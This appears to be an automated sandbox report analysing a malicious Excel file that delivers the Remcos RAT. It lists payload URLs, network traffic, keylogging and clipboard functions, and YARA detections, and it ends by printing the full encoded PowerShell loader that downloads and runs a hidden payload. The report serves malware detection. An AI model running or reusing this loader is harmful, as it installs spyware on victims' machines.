                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.485113430.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000001A.00000002.484892506.000000000036C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/sK
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 00000018.00000002.490099696.0000000000234000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428720236.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/
                  Source: mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/e
                  Source: 037002451082_10142024.xls, 7D330000.0.drString found in binary or memory: https://jfm.com.co/k3l?&alloy=handsome&c
                  Source: mshta.exe, 0000000F.00000002.478469673.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=oran
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: powershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
                  Source: powershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgX
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.523357384.000000001A680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.525828262.000000001ABED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 00000018.00000002.493794174.0000000002688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv8F64.tmp.24.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49170 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000031_2_0040A2F3
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041183A OpenClipboard,GetLastError,24_2_0041183A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,25_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,31_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,31_2_0040A41B
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CA73 SystemParametersInfoW,31_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3392, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Excel sheet contains many unusual embedded objects
                  Source: 037002451082_10142024.xlsOLE: Microsoft Excel 2007+
                  Source: 037002451082_10142024.xlsOLE: Microsoft Excel 2007+
                  Source: 7D330000.0.drOLE: Microsoft Excel 2007+
                  Source: 7D330000.0.drOLE: Microsoft Excel 2007+
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].htaJump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 